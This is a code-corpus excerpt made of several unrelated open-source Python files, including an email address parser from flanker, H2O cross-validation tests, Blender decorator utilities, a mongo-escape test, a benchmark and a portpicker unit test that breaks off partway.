t = round(self.solver.t, 5)
if 0 <= t <= self.T:
self.xt.append(x)
self.ut.append(self.u(t))
self.t.append(t)
return t, x
def simulate(self):
'''
Starts the simulation
Returns
-------
List of numpy arrays with time steps and simulation data of system and input variables.
'''
t = 0
while t <= self.T:
t, y = self.calcStep()
return [np.array(self.t), np.array(self.xt), np.array(self.ut)]
| akunze3/pytrajectory | pytrajectory/simulation.py | Python | bsd-3-clause | 2,039 |
# coding:utf-8
'''
_AddressParser is an implementation of a recursive descent parser for email
addresses and urls. While _AddressParser can be used directly it is not
recommended, use the the parse() and parse_list() methods which are provided
in the address module for convenience.
The grammar supported by the parser (as well as other limitations) are
outlined below. Plugins are also supported to allow for custom more
restrictive grammar that is typically seen at large Email Service Providers
(ESPs).
For email addresses, the grammar tries to stick to RFC 5322 as much as
possible, but includes relaxed (lax) grammar as well to support for common
realistic uses of email addresses on the Internet.
Grammar:
address-list -> address { delimiter address }
mailbox -> name-addr-rfc | name-addr-lax | addr-spec | url
name-addr-rfc -> [ display-name-rfc ] angle-addr-rfc
display-name-rfc -> [ whitespace ] word { whitespace word }
angle-addr-rfc -> [ whitespace ] < addr-spec > [ whitespace ]
name-addr-lax -> [ display-name-lax ] angle-addr-lax
display-name-lax -> [ whitespace ] word { whitespace word } whitespace
angle-addr-lax -> addr-spec [ whitespace ]
addr-spec -> [ whitespace ] local-part @ domain [ whitespace ]
local-part -> dot-atom | quoted-string
domain -> dot-atom
word -> word-ascii | word-unicode
word-ascii -> atom | quoted-string
word-unicode -> unicode-atom | unicode-qstring
whitespace -> whitespace-ascii | whitespace-unicode
Additional limitations on email addresses:
1. local-part:
* Must not be greater than 64 octets
2. domain:
* No more than 127 levels
* Each level no more than 63 octets
* Texual representation can not exceed 253 characters
* No level can being or end with -
3. Maximum mailbox length is len(local-part) + len('@') + len(domain) which
is 64 + 1 + 253 = 318 characters. Allow 194 characters for a display
name and the (very generous) limit becomes 512 characters. Allow 1024
mailboxes and the total limit on a mailbox-list is 524288 characters.
'''
import re
import flanker.addresslib.address
from flanker.addresslib.tokenizer import TokenStream
from flanker.addresslib.tokenizer import LBRACKET
from flanker.addresslib.tokenizer import AT_SYMBOL
from flanker.addresslib.tokenizer import RBRACKET
from flanker.addresslib.tokenizer import DQUOTE
from flanker.addresslib.tokenizer import BAD_DOMAIN
from flanker.addresslib.tokenizer import DELIMITER
from flanker.addresslib.tokenizer import RELAX_ATOM
from flanker.addresslib.tokenizer import WHITESPACE
from flanker.addresslib.tokenizer import UNI_WHITE
from flanker.addresslib.tokenizer import ATOM
from flanker.addresslib.tokenizer import UNI_ATOM
from flanker.addresslib.tokenizer import UNI_QSTR
from flanker.addresslib.tokenizer import DOT_ATOM
from flanker.addresslib.tokenizer import QSTRING
from flanker.addresslib.tokenizer import URL
from flanker.mime.message.headers.encoding import encode_string
from flanker.utils import is_pure_ascii
from flanker.utils import contains_control_chars
from flanker.utils import cleanup_display_name
from flanker.utils import cleanup_email
from flanker.utils import to_utf8
class _AddressParser(object):
'''
Do not use _AddressParser directly because it heavily relies on other
private classes and methods and it's interface is not guarenteed, it
will change in the future and possibly break your application.
Instead use the parse() and parse_list() functions in the address.py
module which will always return a scalar or iterable respectively.
'''
def __init__(self, strict=False):
self.stream = None
self.strict = strict
def address_list(self, stream):
'''
Extract a mailbox and/or url list from a stream of input, operates in
strict and relaxed modes.
'''
# sanity check
if not stream:
raise ParserException('No input provided to parser.')
if isinstance(stream, str) and not is_pure_ascii(stream):
raise ParserException('ASCII string contains non-ASCII chars.')
# to avoid spinning here forever, limit address list length
if len(stream) > MAX_ADDRESS_LIST_LENGTH:
raise ParserException('Stream length exceeds maximum allowable ' + \
'address list length of ' + str(MAX_ADDRESS_LIST_LENGTH) + '.')
# set stream
self.stream = TokenStream(stream)
if self.strict is True:
return self._address_list_strict()
return self._address_list_relaxed()
def address(self, stream):
'''
Extract a single address or url from a stream of input, always
operates in strict mode.
'''
# sanity check
if not stream:
raise ParserException('No input provided to parser.')
if isinstance(stream, str) and not is_pure_ascii(stream):
raise ParserException('ASCII string contains non-ASCII chars.')
# to avoid spinning here forever, limit mailbox length
if len(stream) > MAX_ADDRESS_LENGTH:
raise ParserException('Stream length exceeds maximum allowable ' + \
'address length of ' + str(MAX_ADDRESS_LENGTH) + '.')
self.stream = TokenStream(stream)
addr = self._address()
if addr:
# optional whitespace
self._whitespace()
# if we hit the end of the stream, we have a valid inbox
if self.stream.end_of_stream():
return addr
return None
def address_spec(self, stream):
'''
Extract a single address spec from a stream of input, always
operates in strict mode.
'''
# sanity check
if stream is None:
raise ParserException('No input provided to parser.')
if isinstance(stream, str) and not is_pure_ascii(stream):
raise ParserException('ASCII string contains non-ASCII chars.')
# to avoid spinning here forever, limit mailbox length
if len(stream) > MAX_ADDRESS_LENGTH:
raise ParserException('Stream length exceeds maximum allowable ' + \
'address length of ' + str(MAX_ADDRESS_LENGTH) + '.')
self.stream = TokenStream(stream)
addr = self._addr_spec()
if addr:
# optional whitespace
self._whitespace()
# if we hit the end of the stream, we have a valid inbox
if self.stream.end_of_stream():
return addr
return None
def _mailbox_post_processing_checks(self, address):
"Additional post processing checks to ensure mailbox is valid."
parts = address.split('@')
# check if local part is less than 256 octets, the actual
# limit is 64 octets but we quadruple the size here because
# unsubscribe links are frequently longer
lpart = parts[0]
if len(lpart) > 256:
return False
# check if the domain is less than 255 octets
domn = parts[1]
if len(domn) > 253:
return False
# number of labels can not be over 127
labels = domn.split('.')
if len(labels) > 127:
return False
for label in labels:
# check the domain doesn't start or end with - and
# the length of each label is no more than 63 octets
if BAD_DOMAIN.search(label) or len(label) > 63:
return False
return True
def _address_list_relaxed(self):
"Grammar: address-list-relaxed -> address { delimiter address }"
#addrs = []
addrs = flanker.addresslib.address.AddressList()
unparsable = []
# address
addr = self._address()
if addr is None:
# synchronize to the next delimiter (or end of line)
# append the skipped over text to the unparsable list
skip = self.stream.synchronize()
if skip:
unparsable.append(skip)
# if no mailbox and end of stream, we were unable
# return the unparsable stream
if self.stream.end_of_stream():
return [], unparsable
else:
# if we found a delimiter or end of stream, we have a
# valid mailbox, add it
if self.stream.peek(DELIMITER) or self.stream.end_of_stream():
addrs.append(addr)
else:
# otherwise snychornize and add it the unparsable array
skip = self.stream.synchronize()
if skip:
pre = self.stream.stream[:self.stream.stream.index(skip)]
unparsable.append(pre + skip)
# if we hit the end of the stream, return the results
if self.stream.end_of_stream():
return [], [self.stream.stream]
while True:
# delimiter
dlm = self.stream.get_token(DELIMITER)
if dlm is None:
skip = self.stream.synchronize()
if skip:
unparsable.append(skip)
if self.stream.end_of_stream():
break
# address
start_pos = self.stream.position
addr = self._address()
if addr is None:
skip = self.stream.synchronize()
if skip:
unparsable.append(skip)
if self.stream.end_of_stream():
break
else:
# if we found a delimiter or end of stream, we have a
# valid mailbox, add it
if self.stream.peek(DELIMITER) or self.stream.end_of_stream():
addrs.append(addr)
else:
# otherwise snychornize and add it the unparsable array
skip = self.stream.synchronize()
if skip:
sskip = self.stream.stream[start_pos:self.stream.position]
unparsable.append(sskip)
# if we hit the end of the stream, return the results
if self.stream.end_of_stream():
return addrs, unparsable
return addrs, unparsable
def _address_list_strict(self):
"Grammar: address-list-strict -> address { delimiter address }"
#addrs = []
addrs = flanker.addresslib.address.AddressList()
# address
addr = self._address()
if addr is None:
return addrs
if self.stream.peek(DELIMITER):
addrs.append(addr)
while True:
# delimiter
dlm = self.stream.get_token(DELIMITER)
if dlm is None:
break
# address
addr = self._address()
if addr is None:
break
addrs.append(addr)
return addrs
def _address(self):
"Grammar: address -> name-addr-rfc | name-addr-lax | addr-spec | url"
start_pos = self.stream.position
addr = self._name_addr_rfc() or self._name_addr_lax() or \
self._addr_spec() or self._url()
# if email address, check that it passes post processing checks
if addr and isinstance(addr, flanker.addresslib.address.EmailAddress):
if self._mailbox_post_processing_checks(addr.address) is False:
# roll back
self.stream.position = start_pos
return None
return addr
def _url(self):
"Grammar: url -> url"
earl = self.stream.get_token(URL)
if earl is None:
return None
return flanker.addresslib.address.UrlAddress(to_utf8(earl))
def _name_addr_rfc(self):
"Grammar: name-addr-rfc -> [ display-name-rfc ] angle-addr-rfc"
start_pos = self.stream.position
# optional displayname
dname = self._display_name_rfc()
aaddr = self._angle_addr_rfc()
if aaddr is None:
# roll back
self.stream.position = start_pos
return None
if dname:
return flanker.addresslib.address.EmailAddress(dname, aaddr)
return flanker.addresslib.address.EmailAddress(None, aaddr)
def _display_name_rfc(self):
"Grammar: display-name-rfc -> [ whitespace ] word { whitespace word }"
wrds = []
# optional whitespace
self._whitespace()
# word
wrd = self._word()
if wrd is None:
return None
wrds.append(wrd)
while True:
# whitespace
wtsp = self._whitespace()
if wtsp is None:
break
wrds.append(wtsp)
# word
wrd = self._word()
if wrd is None:
break
wrds.append(wrd)
return cleanup_display_name(''.join(wrds))
def _angle_addr_rfc(self):
'''
Grammar: angle-addr-rfc -> [ whitespace ] < addr-spec > [ whitespace ]"
'''
start_pos = self.stream.position
# optional whitespace
self._whitespace()
# left angle bracket
lbr = self.stream.get_token(LBRACKET)
if lbr is None:
# rollback
self.stream.position = start_pos
return None
# addr-spec
aspec = self._addr_spec(True)
if aspec is None:
# rollback
self.stream.position = start_pos
return None
# right angle bracket
rbr = self.stream.get_token(RBRACKET)
if rbr is None:
# rollback
self.stream.position = start_pos
return None
# optional whitespace
self._whitespace()
return aspec
def _name_addr_lax(self):
"Grammar: name-addr-lax -> [ display-name-lax ] angle-addr-lax"
start_pos = self.stream.position
# optional displayname
dname = self._display_name_lax()
aaddr = self._angle_addr_lax()
if aaddr is None:
# roll back
self.stream.position = start_pos
return None
if dname:
return flanker.addresslib.address.EmailAddress(dname, aaddr)
return flanker.addresslib.address.EmailAddress(None, aaddr)
def _display_name_lax(self):
'''
Grammar: display-name-lax ->
[ whitespace ] word { whitespace word } whitespace"
'''
start_pos = self.stream.position
wrds = []
# optional whitespace
self._whitespace()
# word
wrd = self._word()
if wrd is None:
# roll back
self.stream.position = start_pos
return None
wrds.append(wrd)
# peek to see if we have a whitespace,
# if we don't, we have a invalid display-name
if self.stream.peek(WHITESPACE) is None or \
self.stream.peek(UNI_WHITE) is None:
self.stream.position = start_pos
return None
while True:
# whitespace
wtsp = self._whitespace()
if wtsp:
wrds.append(wtsp)
# if we need to roll back the next word
start_pos = self.stream.position
# word
wrd = self._word()
if wrd is None:
self.stream.position = start_pos
break
wrds.append(wrd)
# peek to see if we have a whitespace
# if we don't pop off the last word break
if self.stream.peek(WHITESPACE) is None or \
self.stream.peek(UNI_WHITE) is None:
# roll back last word
self.stream.position = start_pos
wrds.pop()
break
return cleanup_display_name(''.join(wrds))
def _angle_addr_lax(self):
"Grammar: angle-addr-lax -> addr-spec [ whitespace ]"
start_pos = self.stream.position
# addr-spec
aspec = self._addr_spec(True)
if aspec is None:
# rollback
self.stream.position = start_pos
return None
# optional whitespace
self._whitespace()
return aspec
def _addr_spec(self, as_string=False):
'''
Grammar: addr-spec -> [ whitespace ] local-part @ domain [ whitespace ]
'''
start_pos = self.stream.position
# optional whitespace
self._whitespace()
lpart = self._local_part()
if lpart is None:
# rollback
self.stream.position = start_pos
return None
asym = self.stream.get_token(AT_SYMBOL)
if asym is None:
# rollback
self.stream.position = start_pos
return None
domn = self._domain()
if domn is None:
# rollback
self.stream.position = start_pos
return None
# optional whitespace
self._whitespace()
aspec = cleanup_email(''.join([lpart, asym, domn]))
if as_string:
return aspec
return flanker.addresslib.address.EmailAddress(None, aspec)
def _local_part(self):
"Grammar: local-part -> dot-atom | quoted-string"
return self.stream.get_token(DOT_ATOM) or \
self.stream.get_token(QSTRING)
def _domain(self):
"Grammar: domain -> dot-atom"
return self.stream.get_token(DOT_ATOM)
def _word(self):
"Grammar: word -> word-ascii | word-unicode"
start_pos = self.stream.position
# ascii word
ascii_wrd = self._word_ascii()
if ascii_wrd and not self.stream.peek(UNI_ATOM):
return ascii_wrd
# didn't get an ascii word, rollback to try again
self.stream.position = start_pos
# unicode word
return self._word_unicode()
def _word_ascii(self):
"Grammar: word-ascii -> atom | qstring"
wrd = self.stream.get_token(RELAX_ATOM) or self.stream.get_token(QSTRING)
if wrd and not contains_control_chars(wrd):
return wrd
return None
def _word_unicode(self):
"Grammar: word-unicode -> unicode-atom | unicode-qstring"
start_pos = self.stream.position
# unicode atom
uwrd = self.stream.get_token(UNI_ATOM)
if uwrd and isinstance(uwrd, unicode) and not contains_control_chars(uwrd):
return uwrd
# unicode qstr
uwrd = self.stream.get_token(UNI_QSTR, 'qstr')
if uwrd and isinstance(uwrd, unicode) and not contains_control_chars(uwrd):
return u'"{0}"'.format(encode_string(None, uwrd))
# rollback
self.stream.position = start_pos
return None
def _whitespace(self):
"Grammar: whitespace -> whitespace-ascii | whitespace-unicode"
return self._whitespace_ascii() or self._whitespace_unicode()
def _whitespace_ascii(self):
"Grammar: whitespace-ascii -> whitespace-ascii"
return self.stream.get_token(WHITESPACE)
def _whitespace_unicode(self):
"Grammar: whitespace-unicode -> whitespace-unicode"
uwhite = self.stream.get_token(UNI_WHITE)
if uwhite and not is_pure_ascii(uwhite):
return uwhite
return None
class ParserException(Exception):
'''
Exception raised when the parser encounters some parsing exception.
'''
def __init__(self, reason='Unknown parser error.'):
self.reason = reason
def __str__(self):
return self.reason
MAX_ADDRESS_LENGTH = 512
MAX_ADDRESS_NUMBER = 1024
MAX_ADDRESS_LIST_LENGTH = MAX_ADDRESS_LENGTH * MAX_ADDRESS_NUMBER
| alex/flanker | flanker/addresslib/parser.py | Python | apache-2.0 | 20,067 |
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
import random
import inspect
def cv_carsGBM():
# read in the dataset and construct training set (and validation set)
cars = h2o.import_file(path=pyunit_utils.locate("smalldata/junit/cars_20mpg.csv"))
# choose the type model-building exercise (multinomial classification or regression). 0:regression, 1:binomial,
# 2:multinomial
problem = random.sample(range(3),1)[0]
# pick the predictors and response column, along with the correct distribution
predictors = ["displacement","power","weight","acceleration","year"]
if problem == 1 :
response_col = "economy_20mpg"
distribution = "bernoulli"
cars[response_col] = cars[response_col].asfactor()
elif problem == 2 :
response_col = "cylinders"
distribution = "multinomial"
cars[response_col] = cars[response_col].asfactor()
else :
response_col = "economy"
distribution = "gaussian"
print "Distribution: {0}".format(distribution)
print "Response column: {0}".format(response_col)
## cross-validation
# 1. check that cv metrics are the same over repeated "Modulo" runs
nfolds = random.randint(3,10)
gbm1 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=nfolds, distribution=distribution, ntrees=5,
fold_assignment="Modulo")
gbm2 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=nfolds, distribution=distribution, ntrees=5,
fold_assignment="Modulo")
pyunit_utils.check_models(gbm1, gbm2, True)
# 2. check that cv metrics are different over repeated "Random" runs
nfolds = random.randint(3,10)
gbm1 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=nfolds, distribution=distribution, ntrees=5,
fold_assignment="Random")
gbm2 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=nfolds, distribution=distribution, ntrees=5,
fold_assignment="Random")
try:
pyunit_utils.check_models(gbm1, gbm2, True)
assert False, "Expected models to be different over repeated Random runs"
except AssertionError:
assert True
# 3. folds_column
num_folds = random.randint(2,5)
fold_assignments = h2o.H2OFrame([[random.randint(0,num_folds-1) for f in range(cars.nrow)]])
fold_assignments.set_names(["fold_assignments"])
cars = cars.cbind(fold_assignments)
gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], training_frame=cars, distribution=distribution, ntrees=5,
fold_column="fold_assignments", keep_cross_validation_predictions=True)
num_cv_models = len(gbm._model_json['output']['cross_validation_models'])
assert num_cv_models==num_folds, "Expected {0} cross-validation models, but got " \
"{1}".format(num_folds, num_cv_models)
cv_model1 = h2o.get_model(gbm._model_json['output']['cross_validation_models'][0]['name'])
cv_model2 = h2o.get_model(gbm._model_json['output']['cross_validation_models'][1]['name'])
# 4. keep_cross_validation_predictions
cv_predictions = gbm1._model_json['output']['cross_validation_predictions']
assert cv_predictions is None, "Expected cross-validation predictions to be None, but got {0}".format(cv_predictions)
cv_predictions = gbm._model_json['output']['cross_validation_predictions']
assert len(cv_predictions)==num_folds, "Expected the same number of cross-validation predictions " \
"as folds, but got {0}".format(len(cv_predictions))
# # 5. manually construct models
# fold1 = cars[cars["fold_assignments"]==0]
# fold2 = cars[cars["fold_assignments"]==1]
# manual_model1 = h2o.gbm(y=fold2[response_col],
# x=fold2[predictors],
# validation_y=fold1[response_col],
# validation_x=fold1[predictors], ntrees=5,
# distribution=distribution)
# manual_model2 = h2o.gbm(y=fold1[response_col],
# x=fold1[predictors],
# validation_y=fold2[response_col],
# validation_x=fold2[predictors], ntrees=5,
# distribution=distribution)
## boundary cases
# 1. nfolds = number of observations (leave-one-out cross-validation)
gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=cars.nrow, distribution=distribution, ntrees=5,
fold_assignment="Modulo")
# 2. nfolds = 0
gbm1 = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=0, distribution=distribution, ntrees=5)
# check that this is equivalent to no nfolds
gbm2 = h2o.gbm(y=cars[response_col], x=cars[predictors], distribution=distribution, ntrees=5)
pyunit_utils.check_models(gbm1, gbm2)
# 3. cross-validation and regular validation attempted
gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=random.randint(3,10), validation_y=cars[response_col], ntrees=5,
validation_x=cars[predictors], distribution=distribution)
## error cases
# 1. nfolds == 1 or < 0
try:
gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=random.sample([-1,1], 1)[0], ntrees=5,
distribution=distribution)
assert False, "Expected model-build to fail when nfolds is 1 or < 0"
except EnvironmentError:
assert True
# 2. more folds than observations
try:
gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=cars.nrow+1, distribution=distribution, ntrees=5,
fold_assignment="Modulo")
assert False, "Expected model-build to fail when nfolds > nobs"
except EnvironmentError:
assert True
# 3. fold_column and nfolds both specified
try:
gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], nfolds=3, fold_column="fold_assignments", ntrees=5,
distribution=distribution, training_frame=cars)
assert False, "Expected model-build to fail when fold_column and nfolds both specified"
except EnvironmentError:
assert True
# 4. fold_column and fold_assignment both specified
try:
gbm = h2o.gbm(y=cars[response_col], x=cars[predictors], fold_assignment="Random", fold_column="fold_assignments", ntrees=5,
distribution=distribution, training_frame=cars)
assert False, "Expected model-build to fail when fold_column and fold_assignment both specified"
except EnvironmentError:
assert True
if __name__ == "__main__":
pyunit_utils.standalone_test(cv_carsGBM)
else:
cv_carsGBM()
| madmax983/h2o-3 | h2o-py/tests/testdir_algos/gbm/pyunit_DEPRECATED_cv_carsGBM.py | Python | apache-2.0 | 6,858 |
# Copyright (C) 2020 Christopher Gearhart
# chris@bblanimation.com
# http://bblanimation.com/
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# System imports
import time
import sys
# Blender imports
import bpy
# Module imports
from .reporting import stopwatch
# https://github.com/CGCookie/retopoflow
def timed_call(label="Time Elapsed", precision=2):
def wrapper(fn):
def wrapped(*args, **kwargs):
time_beg = time.time()
ret = fn(*args, **kwargs)
stopwatch(label, time_beg, precision=precision)
return ret
return wrapped
return wrapper
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, "init"):
major, minor, rev = bpy.app.version
blenderver = "%d.%02d" % (major, minor)
self.fns = {}
self.ops = {
"<": lambda v: blenderver < v,
">": lambda v: blenderver > v,
"<=": lambda v: blenderver <= v,
"==": lambda v: blenderver == v,
">=": lambda v: blenderver >= v,
"!=": lambda v: blenderver != v,
}
self.init = True
update_fn = self.ops[op](ver)
fns = self.fns
def wrapit(fn):
n = fn.__name__
if update_fn:
fns[n] = fn
def callit(*args, **kwargs):
return fns[n](*args, **kwargs)
return callit
return wrapit
# This program shows off a python decorator(
# which implements tail call optimization. It
# does this by throwing an exception if it is
# its own grandparent, and catching such
# exceptions to recall the stack.
# https://code.activestate.com/recipes/474088-tail-call-optimization-decorator/
class TailRecurseException(Exception):
def __init__(self, args, kwargs):
self.args = args
self.kwargs = kwargs
def tail_call_optimized(g):
"""
This function decorates a function with tail call
optimization. It does this by throwing an exception
if it is its own grandparent, and catching such
exceptions to fake the tail call optimization.
This function fails if the decorated
function recurses in a non-tail context.
"""
def func(*args, **kwargs):
f = sys._getframe()
if f.f_back and f.f_back.f_back and f.f_back.f_back.f_code == f.f_code:
raise TailRecurseException(args, kwargs)
while True:
try:
return g(*args, **kwargs)
except TailRecurseException as e:
args = e.args
kwargs = e.kwargs
func.__doc__ = g.__doc__
return func
# # USAGE:
# @tail_call_optimized
# def factorial(n, acc=1):
# "calculate a factorial"
# if n == 0:
# return acc
# return factorial(n-1, n*acc)
#
# print factorial(10000)
# # prints a big, big number,
# # but doesn't hit the recursion limit.
#
# @tail_call_optimized
# def fib(i, current = 0, next = 1):
# if i == 0:
# return current
# else:
# return fib(i - 1, next, current + next)
#
# print fib(10000)
# # also prints a big number,
# # but doesn't hit the recursion limit.
| feureau/Small-Scripts | Blender/Blender config/2.91/scripts/addons/bricksculpt_v1-2-0/functions/common/wrappers.py | Python | gpl-3.0 | 3,894 |
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from st2common.util import mongoescape
class TestMongoEscape(unittest.TestCase):
def test_unnested(self):
field = {'k1.k1.k1': 'v1', 'k2$': 'v2', '$k3.': 'v3'}
escaped = mongoescape.escape_chars(field)
self.assertEqual(escaped, {u'k1\uff0ek1\uff0ek1': 'v1',
u'k2\uff04': 'v2',
u'\uff04k3\uff0e': 'v3'}, 'Escaping failed.')
unescaped = mongoescape.unescape_chars(escaped)
self.assertEqual(unescaped, field, 'Unescaping failed.')
def test_nested(self):
nested_field = {'nk1.nk1.nk1': 'v1', 'nk2$': 'v2', '$nk3.': 'v3'}
field = {'k1.k1.k1': nested_field, 'k2$': 'v2', '$k3.': 'v3'}
escaped = mongoescape.escape_chars(field)
self.assertEqual(escaped, {u'k1\uff0ek1\uff0ek1': {u'\uff04nk3\uff0e': 'v3',
u'nk1\uff0enk1\uff0enk1': 'v1',
u'nk2\uff04': 'v2'},
u'k2\uff04': 'v2',
u'\uff04k3\uff0e': 'v3'}, 'un-escaping failed.')
unescaped = mongoescape.unescape_chars(escaped)
self.assertEqual(unescaped, field, 'Unescaping failed.')
def test_unescaping_of_rule_criteria(self):
# Verify that dot escaped in rule criteria is correctly escaped.
# Note: In the past we used different character to escape dot in the
# rule criteria.
escaped = {
u'k1\u2024k1\u2024k1': 'v1',
u'k2$': 'v2',
u'$k3\u2024': 'v3'
}
unescaped = {
'k1.k1.k1': 'v1',
'k2$': 'v2',
'$k3.': 'v3'
}
result = mongoescape.unescape_chars(escaped)
self.assertEqual(result, unescaped)
| jtopjian/st2 | st2common/tests/unit/test_mongoescape.py | Python | apache-2.0 | 2,640 |
import bench
from _collections import namedtuple
T = namedtuple("Tup", ["foo1", "foo2", "foo3", "foo4", "num"])
def test(num):
t = T(0, 0, 0, 0, 20000000)
i = 0
while i < t.num:
i += 1
bench.run(test)
| martinribelotta/micropython | tests/bench/var-8.1-namedtuple-5th.py | Python | mit | 224 |
#!/usr/bin/python
#
# Copyright 2007 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unittests for the portpicker module."""
from __future__ import print_function
import errno
import os
import random
import socket
import sys
import unittest
from contextlib import ExitStack
if sys.platform == 'win32':
import _winapi
else:
_winapi = None
try:
# pylint: disable=no-name-in-module
from unittest import mock # Python >= 3.3.
except ImportError:
import mock # https://pypi.python.org/pypi/mock
import portpicker
class PickUnusedPortTest(unittest.TestCase):
def IsUnusedTCPPort(self, port):
return self._bind(port, socket.SOCK_STREAM, socket.IPPROTO_TCP)
def IsUnusedUDPPort(self, port):
return self._bind(port, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
def setUp(self):
# So we can Bind even if portpicker.bind is stubbed out.
self._bind = portpicker.bind
portpicker._owned_ports.clear()
portpicker._free_ports.clear()
portpicker._random_ports.clear()
def testPickUnusedPortActuallyWorks(self):
"""This test can be flaky."""
for _ in range(10):
port = portpicker.pick_unused_port()
self.assertTrue(self.IsUnusedTCPPort(port))
self.assertTrue(self.IsUnusedUDPPort(port))
@unittest.skipIf('PORTSERVER_ADDRESS' not in os.environ,
'no port server to test against')
def testPickUnusedCanSuccessfullyUsePortServer(self):
with mock.patch.object(portpicker, '_pick_unused_port_without_server'):
portpicker._pick_unused_port_without_server.side_effect = (
Exception('eek!')
)
# Since _PickUnusedPortWithoutServer() raises an exception, if we
# can successfully obtain a port, the portserver must be working.
port = portpicker.pick_unused_port()
self.assertTrue(self.IsUnusedTCPPort(port))
self.assertTrue(self.IsUnusedUDPPort(port))
@unittest.skipIf('PORTSERVER_ADDRESS' not in os.environ,
'no port server to test against')
def testPickUnusedCanSuccessfullyUsePortServerAddressKwarg(self):
with mock.patch.object(portpicker, '_pick_unused_port_without_server'):
portpicker._pick_unused_port_without_server.side_effect = (
Exception('eek!')
)
# Since _PickUnusedPortWithoutServer() raises an exception, and
# we've temporarily removed PORTSERVER_ADDRESS from os.environ, if
# we can successfully obtain a port, the portserver must be working.
addr = os.environ.pop('PORTSERVER_ADDRESS')
try:
port = portpicker.pick_unused_port(portserver_address=addr)
self.assertTrue(self.IsUnusedTCPPort(port))
self.assertTrue(self.IsUnusedUDPPort(port))
finally:
os.environ['PORTSERVER_ADDRESS'] = addr
@unittest.skipIf('PORTSERVER_ADDRESS' not in os.environ,
'no port server to test against')
def testGetPortFromPortServer(self):
"""Exercise the get_port_from_port_server() helper function."""
for _ in range(10):
port = portpicker.get_port_from_port_server(
os.environ['PORTSERVER_ADDRESS'])
self.assertTrue(self.IsUnusedTCPPort(port))
self.assertTrue(self.IsUnusedUDPPort(port))
def testSendsPidToPortServer(self):
with ExitStack() as stack:
if _winapi:
create_file_mock = mock.Mock()
create_file_mock.return_value = 0
read_file_mock = mock.Mock()
write_file_mock = mock.Mock()
read_file_mock.return_value = (b'42768\n', 0)
stack.enter_context(
mock.patch('_winapi.CreateFile', new=create_file_mock))
stack.enter_context(
mock.patch('_winapi.WriteFile', new=write_file_mock))
stack.enter_context(
mock.patch('_winapi.ReadFile', new=read_file_mock))
port = portpicker.get_port_from_port_server(
'portserver', pid=1234)
write_file_mock.assert_called_once_with(0, b'1234\n')
else:
server = mock.Mock()
server.recv.return_value = b'42768\n'
stack.enter_context(
mock.patch.object(socket, 'socket', return_value=server))
port = portpicker.get_port_from_port_server(
'portserver', pid=1234)
server.sendall.assert_called_once_with(b'1234\n')
self.assertEqual(port, 42768)
def testPidDefaultsToOwnPid(self):
with ExitStack() as stack:
stack.enter_context(
mock.patch.object(os, 'getpid', return_value=9876))
if _winapi:
create_file_mock = mock.Mock()
create_file_mock.return_value = 0
read_file_mock = mock.Mock()
write_file_mock = mock.Mock()
read_file_mock.return_value = (b'52768\n', 0)
stack.enter_context(
mock.patch('_winapi.CreateFile', new=create_file_mock))
stack.enter_context(
mock.patch('_winapi.WriteFile', new=write_file_mock))
stack.enter_context(
mock.patch('_winapi.ReadFile', new=read_file_mock))
port = portpicker.get_port_from_port_server('portserver')
write_file_mock.assert_called_once_with(0, b'9876\n')
else:
server = mock.Mock()
server.recv.return_value = b'52768\n'
stack.enter_context(
mock.patch.object(socket, 'socket', return_value=server))
port = portpicker.get_port_from_port_server('portserver')
server.sendall.assert_called_once_with(b'9876\n')
self.assertEqual(port, 52768)
@mock.patch.dict(os.environ,{'PORTSERVER_ADDRESS': 'portserver'})
def testReusesPortServerPorts(self):
with ExitStack() as stack:
if _winapi:
read_file_mock = mock.Mock()
read_file_mock.side_effect = [
(b'12345\n', 0),
(b'23456\n', 0),
(b'34567\n', 0),
]
stack.enter_context(mock.patch('_winapi.CreateFile'))
stack.enter_context(mock.patch('_winapi.WriteFile'))
stack.enter_context(
mock.patch('_winapi.ReadFile', new=read_file_mock))
else:
server = mock.Mock()
server.recv.side_effect = [b'12345\n', b'23456\n', b'34567\n']
stack.enter_context(
mock.patch.object(socket, 'socket', return_value=server))
self.assertEqual(portpicker.pick_unused_port(), 12345)
self.assertEqual(portpicker.pick_unused_port(), 23456)
portpicker.return_port(12345)
